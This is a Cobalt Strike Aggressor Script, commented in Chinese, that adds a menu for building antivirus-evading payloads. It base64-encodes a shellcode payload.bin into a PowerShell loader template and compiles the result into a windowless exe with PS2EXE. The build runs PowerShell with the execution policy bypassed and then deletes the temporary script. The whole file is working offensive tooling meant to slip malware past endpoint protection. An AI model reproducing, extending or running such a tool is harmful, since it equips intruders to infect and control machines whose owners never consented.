menubar("powershell免杀","powershell");

popup powershell {
	item("&生成exe",{dialog_powershell()});
}

sub dialog_powershell {
	$info = dialog("powershell bypass AV",%(ps2exe => "ps2exe.ps1",bin => "payload.bin", payload => "payload_cs.ps1",version => "4.0"),&show); 
	drow_file($info,"bin","Choose: default payload.bin");
	drow_combobox($info, "version", "Version: ", @("powershell 4.0", "powershell 2.0"));
	dbutton_action($info,"点击生成！"); # dbutton_action将操作按钮添加到dialog，回调函数
	dialog_show($info); # 显示文本输入框
}

$path = "C:\\Users\\cseroad\\Desktop\\bypassAV-master";
# 修改cna地址

global('$new_strs');

sub payload_bin_to_ps1 {
	$in = openf($bin_path);
	$data = readb($in, -1);
	$b64 = base64_encode($data);
	$org_file = $path.'\\powershell_load.ps1';
	$handle = openf($org_file);
	setEncoding($handle, "UTF-8");
	while $text (readln($handle)){
		$rep = replace($text, 'base64', $b64)."\n";
		$new_strs = $new_strs.$rep;
	}
	$filestring = right($new_strs, int(strlen($new_strs)));
	$out =  openf(">$payload_file_ps1");
	writeb($out, $filestring);
	closef($out);
	closef($in);
	$new_strs = '';
	
}

sub show {
	$bin_path = $3["bin"];
	$payload_file_ps1 = "C:\\windows\\temp\\payload_tmp.ps1";
	$ps2exe = $path.'\.\\PS1toEXE.ps1';
	if (-exists $bin_path) {
		payload_bin_to_ps1($bin_path,$payload_file_ps1);
		$version = right($3["version"], 3);
		$int_version = left($version, 1);
		prompt_file_save("bypass.exe", {
			$paths = "$1";
			if ($int_version == "4") {
				$process = exec('powershell.exe -ExecutionPolicy bypass "'.$ps2exe.' -inputFile '.$payload_file_ps1.' -outputFile '.$paths.' -noConsole -runtime40" ');
			} else {
				$process = exec('cmd.exe /c echo '.$ps2exe.' -inputFile '.$payload_file_ps1.' -outputFile '.$paths.' -noConsole -runtime20 | powershell -ExecutionPolicy bypass');
			}
			@data = readAll($process);
			println(@data);
			closef($process);
			if (-exists $paths) {
				exec('cmd.exe /c del '.$payload_file_ps1);
				show_message("\n输出exe地址：".$paths);
			} else {
				show_message('运行异常，请查看script console');
			}
		});
	}else {
		show_message('请指定bin文件');
	}

}
